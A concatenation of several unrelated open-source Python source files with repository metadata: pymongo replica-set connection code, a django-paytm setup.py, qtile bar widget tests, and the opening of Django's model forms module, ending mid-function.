mongo = self.__find_primary()
else:
mongo = self.__pools[_connection_to_use]
try:
sock = self.__socket(mongo)
rqst_id, data = self.__check_bson_size(msg,
mongo['max_bson_size'])
sock.sendall(data)
# Safe mode. We pack the message together with a lastError
# message and send both. We then get the response (to the
# lastError) and raise OperationFailure if it is an error
# response.
if safe:
response = self.__recv_msg(1, rqst_id, sock)
return self.__check_response_to_last_error(response)
return None
except(ConnectionFailure, socket.error), why:
mongo['pool'].discard_socket()
if _connection_to_use in (None, -1):
self.disconnect()
raise AutoReconnect(str(why))
except:
mongo['pool'].discard_socket()
raise
mongo['pool'].return_socket()
def __send_and_receive(self, mongo, msg, **kwargs):
"""Send a message on the given socket and return the response data.
"""
try:
sock = self.__socket(mongo)
if "network_timeout" in kwargs:
sock.settimeout(kwargs['network_timeout'])
rqst_id, data = self.__check_bson_size(msg,
mongo['max_bson_size'])
sock.sendall(data)
response = self.__recv_msg(1, rqst_id, sock)
if "network_timeout" in kwargs:
sock.settimeout(self.__net_timeout)
mongo['pool'].return_socket()
return response
except (ConnectionFailure, socket.error), why:
host, port = mongo['pool'].host
mongo['pool'].discard_socket()
raise AutoReconnect("%s:%d: %s" % (host, port, str(why)))
except:
mongo['pool'].discard_socket()
raise
def _send_message_with_response(self, msg, _connection_to_use=None,
_must_use_master=False, **kwargs):
"""Send a message to Mongo and return the response.
Sends the given message and returns the response.
:Parameters:
- `msg`: (request_id, data) pair making up the message to send
"""
read_pref = kwargs.get('read_preference', ReadPreference.PRIMARY)
mongo = None
try:
if _connection_to_use is not None:
if _connection_to_use == -1:
mongo = self.__find_primary()
else:
mongo = self.__pools[_connection_to_use]
return mongo['pool'].host, self.__send_and_receive(mongo,
msg,
**kwargs)
elif _must_use_master or not read_pref:
mongo = self.__find_primary()
return mongo['pool'].host, self.__send_and_receive(mongo,
msg,
**kwargs)
except AutoReconnect:
if mongo == self.__writer:
self.disconnect()
raise
errors = []
for host in helpers.shuffled(self.__readers):
try:
mongo = self.__pools[host]
return host, self.__send_and_receive(mongo, msg, **kwargs)
except AutoReconnect, why:
errors.append(str(why))
# Fallback to primary
if read_pref == ReadPreference.SECONDARY:
try:
mongo = self.__find_primary()
return mongo['pool'].host, self.__send_and_receive(mongo,
msg,
**kwargs)
except AutoReconnect, why:
self.disconnect()
errors.append(why)
raise AutoReconnect(', '.join(errors))
def __cmp__(self, other):
# XXX: Implement this?
return NotImplemented
def __repr__(self):
return "ReplicaSetConnection(%r)" % (["%s:%d" % n
for n in self.__hosts],)
def __getattr__(self, name):
"""Get a database by name.
Raises :class:`~pymongo.errors.InvalidName` if an invalid
database name is used.
:Parameters:
- `name`: the name of the database to get
"""
return database.Database(self, name)
def __getitem__(self, name):
"""Get a database by name.
Raises :class:`~pymongo.errors.InvalidName` if an invalid
database name is used.
:Parameters:
- `name`: the name of the database to get
"""
return self.__getattr__(name)
def close_cursor(self, cursor_id, _conn_id):
"""Close a single database cursor.
Raises :class:`TypeError` if `cursor_id` is not an instance of
``(int, long)``. What closing the cursor actually means
depends on this connection's cursor manager.
:Parameters:
- `cursor_id`: id of cursor to close
"""
if not isinstance(cursor_id, (int, long)):
raise TypeError("cursor_id must be an instance of (int, long)")
self._send_message(message.kill_cursors([cursor_id]),
_connection_to_use=_conn_id)
def server_info(self):
"""Get information about the MongoDB primary we're connected to.
"""
return self.admin.command("buildinfo")
def database_names(self):
"""Get a list of the names of all databases on the connected server.
"""
return [db["name"] for db in
self.admin.command("listDatabases")["databases"]]
def drop_database(self, name_or_database):
"""Drop a database.
Raises :class:`TypeError` if `name_or_database` is not an instance of
``(str, unicode, Database)``
:Parameters:
- `name_or_database`: the name of a database to drop, or a
:class:`~pymongo.database.Database` instance representing the
database to drop
"""
name = name_or_database
if isinstance(name, database.Database):
name = name.name
if not isinstance(name, basestring):
raise TypeError("name_or_database must be an instance of "
"(Database, str, unicode)")
self._purge_index(name)
self[name].command("dropDatabase")
def copy_database(self, from_name, to_name,
from_host=None, username=None, password=None):
"""Copy a database, potentially from another host.
Raises :class:`TypeError` if `from_name` or `to_name` is not
an instance of :class:`basestring`. Raises
:class:`~pymongo.errors.InvalidName` if `to_name` is not a
valid database name.
If `from_host` is ``None`` the current host is used as the
source. Otherwise the database is copied from `from_host`.
If the source database requires authentication, `username` and
`password` must be specified.
:Parameters:
- `from_name`: the name of the source database
- `to_name`: the name of the target database
- `from_host` (optional): host name to copy from
- `username` (optional): username for source database
- `password` (optional): password for source database
.. note:: Specifying `username` and `password` requires server
version **>= 1.3.3+**.
"""
if not isinstance(from_name, basestring):
raise TypeError("from_name must be an instance of basestring")
if not isinstance(to_name, basestring):
raise TypeError("to_name must be an instance of basestring")
database._check_name(to_name)
command = {"fromdb": from_name, "todb": to_name}
if from_host is not None:
command["fromhost"] = from_host
if username is not None:
nonce = self.admin.command("copydbgetnonce",
fromhost=from_host)["nonce"]
command["username"] = username
command["nonce"] = nonce
command["key"] = helpers._auth_key(nonce, username, password)
return self.admin.command("copydb", **command)
| {
"content_hash": "c229b5d95310ca1f41936d788c269ae1",
"timestamp": "",
"source": "github",
"line_count": 929,
"max_line_length": 79,
"avg_line_length": 37.853606027987084,
"alnum_prop": 0.5409202070181425,
"repo_name": "couchbaselabs/litmus",
"id": "750745b411eaff6f2105282151837db6864791c6",
"size": "35745",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/pymongo/replica_set_connection.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "103452"
},
{
"name": "CSS",
"bytes": "15530"
},
{
"name": "JavaScript",
"bytes": "713886"
},
{
"name": "Python",
"bytes": "1336652"
}
],
"symlink_target": ""
} |
import os
from setuptools import find_packages, setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-paytm',
version='0.1',
packages=find_packages(),
include_package_data=True,
license='BSD License', # example license
description='A simple Django app to conduct payment using Paytm.',
long_description=README,
author='Naresh Chaudhary',
author_email='[email protected]',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.8',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
# Replace these appropriately if you are stuck on Python 2.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
install_requires = [
"backports.shutil-get-terminal-size==1.0.0",
"decorator==4.0.10",
"enum34==1.1.6",
"ipython-genutils==0.1.0",
"pathlib2==2.1.0",
"pexpect==4.2.1",
"pickleshare==0.7.4",
"prompt-toolkit==1.0.9",
"ptyprocess==0.5.1",
"pycrypto==2.6.1",
"Pygments==2.1.3",
"simplegeneric==0.8.1",
"traitlets==4.3.1",
"wcwidth==0.1.7"
]
) | {
"content_hash": "db35477dd42a98d3ad7c50715ea78c02",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 78,
"avg_line_length": 32.31372549019608,
"alnum_prop": 0.5843446601941747,
"repo_name": "nareshchaudhary37/django-paytm",
"id": "e8164f5900bdff3ef906da86c67f7340eaf9b840",
"size": "1648",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "588"
},
{
"name": "Python",
"bytes": "11406"
}
],
"symlink_target": ""
} |
import pytest
import libqtile.layout
import libqtile.bar
import libqtile.widget
import libqtile.config
import libqtile.confreader
class GBConfig:
auto_fullscreen = True
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("bb"),
libqtile.config.Group("ccc"),
libqtile.config.Group("dddd"),
libqtile.config.Group("Pppy")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.CPUGraph(
width=libqtile.bar.STRETCH,
type="linefill",
border_width=20,
margin_x=1,
margin_y=1
),
libqtile.widget.MemoryGraph(type="line"),
libqtile.widget.SwapGraph(type="box"),
libqtile.widget.TextBox(name="text",
background="333333"),
],
50,
),
bottom=libqtile.bar.Bar(
[
libqtile.widget.GroupBox(),
libqtile.widget.AGroupBox(),
libqtile.widget.Prompt(),
libqtile.widget.WindowName(),
libqtile.widget.Sep(),
libqtile.widget.Clock(),
],
50
),
# TODO: Add vertical bars and test widgets that support them
)
]
main = None
gb_config = pytest.mark.parametrize("qtile", [GBConfig], indirect=True)
def test_completion():
c = libqtile.widget.prompt.CommandCompleter(None, True)
c.reset()
c.lookup = [
("a", "x/a"),
("aa", "x/aa"),
]
assert c.complete("a") == "a"
assert c.actual() == "x/a"
assert c.complete("a") == "aa"
assert c.complete("a") == "a"
c = libqtile.widget.prompt.CommandCompleter(None)
r = c.complete("l")
assert c.actual().endswith(r)
c.reset()
assert c.complete("/bi") == "/bin/"
c.reset()
assert c.complete("/bin") != "/bin/"
c.reset()
assert c.complete("~") != "~"
c.reset()
s = "thisisatotallynonexistantpathforsure"
assert c.complete(s) == s
assert c.actual() == s
c.reset()
@gb_config
def test_draw(qtile):
qtile.test_window("one")
b = qtile.c.bar["bottom"].info()
assert b["widgets"][0]["name"] == "groupbox"
@gb_config
def test_prompt(qtile):
assert qtile.c.widget["prompt"].info()["width"] == 0
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("a")
qtile.c.widget["prompt"].fake_keypress("Tab")
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("slash")
qtile.c.widget["prompt"].fake_keypress("Tab")
@gb_config
def test_event(qtile):
qtile.c.group["bb"].toscreen()
@gb_config
def test_textbox(qtile):
assert "text" in qtile.c.list_widgets()
s = "some text"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
s = "Aye, much longer string than the initial one"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
qtile.c.group["Pppy"].toscreen()
qtile.c.widget["text"].set_font(fontsize=12)
@gb_config
def test_textbox_errors(qtile):
qtile.c.widget["text"].update(None)
qtile.c.widget["text"].update("".join(chr(i) for i in range(255)))
qtile.c.widget["text"].update("V\xE2r\xE2na\xE7\xEE")
qtile.c.widget["text"].update("\ua000")
@gb_config
def test_groupbox_button_press(qtile):
qtile.c.group["ccc"].toscreen()
assert qtile.c.groups()["a"]["screen"] is None
qtile.c.bar["bottom"].fake_button_press(0, "bottom", 10, 10, 1)
assert qtile.c.groups()["a"]["screen"] == 0
class GeomConf:
auto_fullscreen = False
main = None
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("b"),
libqtile.config.Group("c"),
libqtile.config.Group("d")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar([], 10),
bottom=libqtile.bar.Bar([], 10),
left=libqtile.bar.Bar([], 10),
right=libqtile.bar.Bar([], 10),
)
]
geom_config = pytest.mark.parametrize("qtile", [GeomConf], indirect=True)
class DBarH(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = True
class DBarV(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = False
class DWidget:
def __init__(self, length, length_type):
self.length, self.length_type = length, length_type
@geom_config
def test_geometry(qtile):
qtile.test_xeyes()
g = qtile.c.screens()[0]["gaps"]
assert g["top"] == (0, 0, 800, 10)
assert g["bottom"] == (0, 590, 800, 10)
assert g["left"] == (0, 10, 10, 580)
assert g["right"] == (790, 10, 10, 580)
assert len(qtile.c.windows()) == 1
geom = qtile.c.windows()[0]
assert geom["x"] == 10
assert geom["y"] == 10
assert geom["width"] == 778
assert geom["height"] == 578
internal = qtile.c.internal_windows()
assert len(internal) == 4
wid = qtile.c.bar["bottom"].info()["window"]
assert qtile.c.window[wid].inspect()
@geom_config
def test_resize(qtile):
def wd(l):
return [i.length for i in l]
def offx(l):
return [i.offsetx for i in l]
def offy(l):
return [i.offsety for i in l]
for DBar, off in ((DBarH, offx), (DBarV, offy)): # noqa: N806
b = DBar([], 100)
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 40, 40, 10]
assert off(dwidget_list) == [0, 10, 50, 90]
b._resize(101, dwidget_list)
assert wd(dwidget_list) == [10, 40, 41, 10]
assert off(dwidget_list) == [0, 10, 50, 91]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10]
assert off(dwidget_list) == [0]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 90]
assert off(dwidget_list) == [0, 10]
dwidget_list = [
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [90, 10]
assert off(dwidget_list) == [0, 90]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 80, 10]
assert off(dwidget_list) == [0, 10, 90]
class ExampleWidget(libqtile.widget.base._Widget):
orientations = libqtile.widget.base.ORIENTATION_HORIZONTAL
def __init__(self):
libqtile.widget.base._Widget.__init__(self, 10)
def draw(self):
pass
class IncompatibleWidgetConf:
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
left=libqtile.bar.Bar(
[
# This widget doesn't support vertical orientation
ExampleWidget(),
],
10
),
)
]
def test_incompatible_widget(qtile_nospawn):
config = IncompatibleWidgetConf
# Ensure that adding a widget that doesn't support the orientation of the
# bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
class MultiStretchConf:
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
),
)
]
def test_multiple_stretches(qtile_nospawn):
config = MultiStretchConf
# Ensure that adding two STRETCH widgets to the same bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
def test_basic(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
assert i["widgets"][1]["width"] == 780
assert i["widgets"][2]["offset"] == 790
libqtile.hook.clear()
def test_singlespacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][0]["width"] == 800
libqtile.hook.clear()
def test_nospacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
libqtile.hook.clear()
| {
"content_hash": "d3b7ab9489f16255425950c50fe42e38",
"timestamp": "",
"source": "github",
"line_count": 400,
"max_line_length": 79,
"avg_line_length": 27.58,
"alnum_prop": 0.5492204496011602,
"repo_name": "frostidaho/qtile",
"id": "b5f5c63d53f342bfd38b900ba25120770eb78538",
"size": "12270",
"binary": false,
"copies": "2",
"ref": "refs/heads/ida_dev2",
"path": "test/test_bar.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1639"
},
{
"name": "Python",
"bytes": "1179470"
},
{
"name": "Roff",
"bytes": "3605"
},
{
"name": "Shell",
"bytes": "7180"
}
],
"symlink_target": ""
} |
"""
Helper functions for creating Form classes from Django models
and database field objects.
"""
from collections import OrderedDict
from itertools import chain
from django.core.exceptions import (
NON_FIELD_ERRORS, FieldError, ImproperlyConfigured, ValidationError,
)
from django.forms.fields import ChoiceField, Field
from django.forms.forms import BaseForm, DeclarativeFieldsMetaclass
from django.forms.formsets import BaseFormSet, formset_factory
from django.forms.utils import ErrorList
from django.forms.widgets import (
HiddenInput, MultipleHiddenInput, SelectMultiple,
)
from django.utils.text import capfirst, get_text_list
from django.utils.translation import gettext, gettext_lazy as _
__all__ = (
'ModelForm', 'BaseModelForm', 'model_to_dict', 'fields_for_model',
'ModelChoiceField', 'ModelMultipleChoiceField', 'ALL_FIELDS',
'BaseModelFormSet', 'modelformset_factory', 'BaseInlineFormSet',
'inlineformset_factory', 'modelform_factory',
)
ALL_FIELDS = '__all__'
def construct_instance(form, instance, fields=None, exclude=None):
"""
Construct and return a model instance from the bound ``form``'s
``cleaned_data``, but do not save the returned instance to the database.
"""
from django.db import models
opts = instance._meta
cleaned_data = form.cleaned_data
file_field_list = []
for f in opts.fields:
if not f.editable or isinstance(f, models.AutoField) \
or f.name not in cleaned_data:
continue
if fields is not None and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
# Leave defaults for fields that aren't in POST data, except for
# checkbox inputs because they don't appear in POST data if not checked.
if (f.has_default() and
form[f.name].field.widget.value_omitted_from_data(form.data, form.files, form.add_prefix(f.name))):
continue
# Defer saving file-type fields until after the other fields, so a
# callable upload_to can use the values from other fields.
if isinstance(f, models.FileField):
file_field_list.append(f)
else:
f.save_form_data(instance, cleaned_data[f.name])
for f in file_field_list:
f.save_form_data(instance, cleaned_data[f.name])
return instance
# ModelForms #################################################################
def model_to_dict(instance, fields=None, exclude=None):
"""
Return a dict containing the data in ``instance`` suitable for passing as
a Form's ``initial`` keyword argument.
``fields`` is an optional list of field names. If provided, return only the
named.
``exclude`` is an optional list of field names. If provided, exclude the
named from the returned dict, even if they are listed in the ``fields``
argument.
"""
opts = instance._meta
data = {}
for f in chain(opts.concrete_fields, opts.private_fields, opts.many_to_many):
if not getattr(f, 'editable', False):
continue
if fields and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
data[f.name] = f.value_from_object(instance)
return data
def apply_limit_choices_to_to_formfield(formfield):
"""Apply limit_choices_to to the formfield's queryset if needed."""
if hasattr(formfield, 'queryset') and hasattr(formfield, 'get_limit_choices_to'):
limit_choices_to = formfield.get_limit_choices_to()
if limit_choices_to is not None:
formfield.queryset = formfield.queryset.complex_filter(limit_choices_to)
def fields_for_model(model, fields=None, exclude=None, widgets=None,
formfield_callback=None, localized_fields=None,
labels=None, help_texts=None, error_messages=None,
field_classes=None, *, apply_limit_choices_to=True):
"""
Return an ``OrderedDict`` containing form fields for the given model.
``fields`` is an optional list of field names. If provided, return only the
named fields.
``exclude`` is an optional list of field names. If provided, exclude the
named fields from the returned fields, even if they are listed in the
``fields`` argument.
``widgets`` is a dictionary of model field names mapped to a widget.
``formfield_callback`` is a callable that takes a model field and returns
a form field.
``localized_fields`` is a list of names of fields which should be localized.
``labels`` is a dictionary of model field names mapped to a label.
``help_texts`` is a dictionary of model field names mapped to a help text.
``error_messages`` is a dictionary of model field names mapped to a
dictionary of error messages.
``field_classes`` is a dictionary of model field names mapped to a form
field class.
``apply_limit_choices_to`` is a boolean indicating if limit_choices_to
should be applied to a field's queryset.
"""
field_list = []
ignored = []
opts = model._meta
# Avoid circular import
from django.db.models.fields import Field as ModelField
sortable_private_fields = [f for f in opts.private_fields if isinstance(f, ModelField)]
for f in sorted(chain(opts.concrete_fields, sortable_private_fields, opts.many_to_many)):
if not getattr(f, 'editable', False):
if (fields is not None and f.name in fields and
(exclude is None or f.name not in exclude)):
raise FieldError(
"'%s' cannot be specified for %s model form as it is a non-editable field" % (
f.name, model.__name__)
)
continue
if fields is not None and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
kwargs = {}
if widgets and f.name in widgets:
kwargs['widget'] = widgets[f.name]
if localized_fields == ALL_FIELDS or (localized_fields and f.name in localized_fields):
kwargs['localize'] = True
if labels and f.name in labels:
kwargs['label'] = labels[f.name]
if help_texts and f.name in help_texts:
kwargs['help_text'] = help_texts[f.name]
if error_messages and f.name in error_messages:
kwargs['error_messages'] = error_messages[f.name]
if field_classes and f.name in field_classes:
kwargs['form_class'] = field_classes[f.name]
if formfield_callback is None:
formfield = f.formfield(**kwargs)
elif not callable(formfield_callback):
raise TypeError('formfield_callback must be a function or callable')
else:
formfield = formfield_callback(f, **kwargs)
if formfield:
if apply_limit_choices_to:
apply_limit_choices_to_to_formfield(formfield)
field_list.append((f.name, formfield))
else:
ignored.append(f.name)
field_dict = OrderedDict(field_list)
if fields:
field_dict = OrderedDict(
[(f, field_dict.get(f)) for f in fields
if ((not exclude) or (exclude and f not in exclude)) and (f not in ignored)]
)
return field_dict
class ModelFormOptions:
def __init__(self, options=None):
self.model = getattr(options, 'model', None)
self.fields = getattr(options, 'fields', None)
self.exclude = getattr(options, 'exclude', None)
self.widgets = getattr(options, 'widgets', None)
self.localized_fields = getattr(options, 'localized_fields', None)
self.labels = getattr(options, 'labels', None)
self.help_texts = getattr(options, 'help_texts', None)
self.error_messages = getattr(options, 'error_messages', None)
self.field_classes = getattr(options, 'field_classes', None)
class ModelFormMetaclass(DeclarativeFieldsMetaclass):
def __new__(mcs, name, bases, attrs):
base_formfield_callback = None
for b in bases:
if hasattr(b, 'Meta') and hasattr(b.Meta, 'formfield_callback'):
base_formfield_callback = b.Meta.formfield_callback
break
formfield_callback = attrs.pop('formfield_callback', base_formfield_callback)
new_class = super(ModelFormMetaclass, mcs).__new__(mcs, name, bases, attrs)
if bases == (BaseModelForm,):
return new_class
opts = new_class._meta = ModelFormOptions(getattr(new_class, 'Meta', None))
# We check if a string was passed to `fields` or `exclude`,
# which is likely to be a mistake where the user typed ('foo') instead
# of ('foo',)
for opt in ['fields', 'exclude', 'localized_fields']:
value = getattr(opts, opt)
if isinstance(value, str) and value != ALL_FIELDS:
msg = ("%(model)s.Meta.%(opt)s cannot be a string. "
"Did you mean to type: ('%(value)s',)?" % {
'model': new_class.__name__,
'opt': opt,
'value': value,
})
raise TypeError(msg)
if opts.model:
# If a model is defined, extract form fields from it.
if opts.fields is None and opts.exclude is None:
raise ImproperlyConfigured(
"Creating a ModelForm without either the 'fields' attribute "
"or the 'exclude' attribute is prohibited; form %s "
"needs updating." % name
)
if opts.fields == ALL_FIELDS:
# Sentinel for fields_for_model to indicate "get the list of
# fields from the model"
opts.fields = None
fields = fields_for_model(
opts.model, opts.fields, opts.exclude, opts.widgets,
formfield_callback, opts.localized_fields, opts.labels,
opts.help_texts, opts.error_messages, opts.field_classes,
# limit_choices_to will be applied during ModelForm.__init__().
apply_limit_choices_to=False,
)
# make sure opts.fields doesn't specify an invalid field
none_model_fields = {k for k, v in fields.items() if not v}
missing_fields = none_model_fields.difference(new_class.declared_fields)
if missing_fields:
message = 'Unknown field(s) (%s) specified for %s'
message = message % (', '.join(missing_fields),
opts.model.__name__)
raise FieldError(message)
# Override default model fields with any custom declared ones
# (plus, include all the other declared fields).
fields.update(new_class.declared_fields)
else:
fields = new_class.declared_fields
new_class.base_fields = fields
return new_class
class BaseModelForm(BaseForm):
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList, label_suffix=None,
empty_permitted=False, instance=None, use_required_attribute=None,
renderer=None):
opts = self._meta
if opts.model is None:
raise ValueError('ModelForm has no model class specified.')
if instance is None:
# if we didn't get an instance, instantiate a new one
self.instance = opts.model()
object_data = {}
else:
self.instance = instance
object_data = model_to_dict(instance, opts.fields, opts.exclude)
# if initial was provided, it should override the values from instance
if initial is not None:
object_data.update(initial)
# self._validate_unique will be set to True by BaseModelForm.clean().
# It is False by default so overriding self.clean() and failing to call
# super will stop validate_unique from being called.
self._validate_unique = False
super().__init__(
data, files, auto_id, prefix, object_data, error_class,
label_suffix, empty_permitted, use_required_attribute=use_required_attribute,
renderer=renderer,
)
for formfield in self.fields.values():
apply_limit_choices_to_to_formfield(formfield)
def _get_validation_exclusions(self):
"""
For backwards-compatibility, exclude several types of fields from model
validation. See tickets #12507, #12521, #12553.
"""
exclude = []
# Build up a list of fields that should be excluded from model field
# validation and unique checks.
for f in self.instance._meta.fields:
field = f.name
# Exclude fields that aren't on the form. The developer may be
# adding these values to the model after form validation.
if field not in self.fields:
exclude.append(f.name)
# Don't perform model validation on fields that were defined
# manually on the form and excluded via the ModelForm's Meta
# class. See #12901.
elif self._meta.fields and field not in self._meta.fields:
exclude.append(f.name)
elif self._meta.exclude and field in self._meta.exclude:
exclude.append(f.name)
# Exclude fields that failed form validation. There's no need for
# the model fields to validate them as well.
elif field in self._errors:
exclude.append(f.name)
# Exclude empty fields that are not required by the form, if the
# underlying model field is required. This keeps the model field
# from raising a required error. Note: don't exclude the field from
# validation if the model field allows blanks. If it does, the blank
# value may be included in a unique check, so cannot be excluded
# from validation.
else:
form_field = self.fields[field]
field_value = self.cleaned_data.get(field)
if not f.blank and not form_field.required and field_value in form_field.empty_values:
exclude.append(f.name)
return exclude
def clean(self):
self._validate_unique = True
return self.cleaned_data
def _update_errors(self, errors):
# Override any validation error messages defined at the model level
# with those defined at the form level.
opts = self._meta
# Allow the model generated by construct_instance() to raise
# ValidationError and have them handled in the same way as others.
if hasattr(errors, 'error_dict'):
error_dict = errors.error_dict
else:
error_dict = {NON_FIELD_ERRORS: errors}
for field, messages in error_dict.items():
if (field == NON_FIELD_ERRORS and opts.error_messages and
NON_FIELD_ERRORS in opts.error_messages):
error_messages = opts.error_messages[NON_FIELD_ERRORS]
elif field in self.fields:
error_messages = self.fields[field].error_messages
else:
continue
for message in messages:
if (isinstance(message, ValidationError) and
message.code in error_messages):
message.message = error_messages[message.code]
self.add_error(None, errors)
def _post_clean(self):
opts = self._meta
exclude = self._get_validation_exclusions()
# Foreign Keys being used to represent inline relationships
# are excluded from basic field value validation. This is for two
# reasons: firstly, the value may not be supplied (#12507; the
# case of providing new values to the admin); secondly the
# object being referred to may not yet fully exist (#12749).
# However, these fields *must* be included in uniqueness checks,
# so this can't be part of _get_validation_exclusions().
for name, field in self.fields.items():
if isinstance(field, InlineForeignKeyField):
exclude.append(name)
try:
self.instance = construct_instance(self, self.instance, opts.fields, opts.exclude)
except ValidationError as e:
self._update_errors(e)
try:
self.instance.full_clean(exclude=exclude, validate_unique=False)
except ValidationError as e:
self._update_errors(e)
# Validate uniqueness if needed.
if self._validate_unique:
self.validate_unique()
def validate_unique(self):
"""
Call the instance's validate_unique() method and update the form's
validation errors if any were raised.
"""
exclude = self._get_validation_exclusions()
try:
self.instance.validate_unique(exclude=exclude)
except ValidationError as e:
self._update_errors(e)
def _save_m2m(self):
"""
Save the many-to-many fields and generic relations for this form.
"""
cleaned_data = self.cleaned_data
exclude = self._meta.exclude
fields = self._meta.fields
opts = self.instance._meta
# Note that for historical reasons we want to include also
# private_fields here. (GenericRelation was previously a fake
# m2m field).
for f in chain(opts.many_to_many, opts.private_fields):
if not hasattr(f, 'save_form_data'):
continue
if fields and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
if f.name in cleaned_data:
f.save_form_data(self.instance, cleaned_data[f.name])
def save(self, commit=True):
"""
Save this form's self.instance object if commit=True. Otherwise, add
a save_m2m() method to the form which can be called after the instance
is saved manually at a later time. Return the model instance.
"""
if self.errors:
raise ValueError(
"The %s could not be %s because the data didn't validate." % (
self.instance._meta.object_name,
'created' if self.instance._state.adding else 'changed',
)
)
if commit:
# If committing, save the instance and the m2m data immediately.
self.instance.save()
self._save_m2m()
else:
# If not committing, add a method to the form to allow deferred
# saving of m2m data.
self.save_m2m = self._save_m2m
return self.instance
save.alters_data = True
class ModelForm(BaseModelForm, metaclass=ModelFormMetaclass):
pass
def modelform_factory(model, form=ModelForm, fields=None, exclude=None,
formfield_callback=None, widgets=None, localized_fields=None,
labels=None, help_texts=None, error_messages=None,
field_classes=None):
"""
Return a ModelForm containing form fields for the given model.
``fields`` is an optional list of field names. If provided, include only
the named fields in the returned fields. If omitted or '__all__', use all
fields.
``exclude`` is an optional list of field names. If provided, exclude the
named fields from the returned fields, even if they are listed in the
``fields`` argument.
``widgets`` is a dictionary of model field names mapped to a widget.
``localized_fields`` is a list of names of fields which should be localized.
``formfield_callback`` is a callable that takes a model field and returns
a form field.
``labels`` is a dictionary of model field names mapped to a label.
``help_texts`` is a dictionary of model field names mapped to a help text.
``error_messages`` is a dictionary of model field names mapped to a
dictionary of error messages.
``field_classes`` is a dictionary of model field names mapped to a form
field class.
"""
# Create the inner Meta class. FIXME: ideally, we should be able to
# construct a ModelForm without creating and passing in a temporary
# inner class.
# Build up a list of attributes that the Meta object will have.
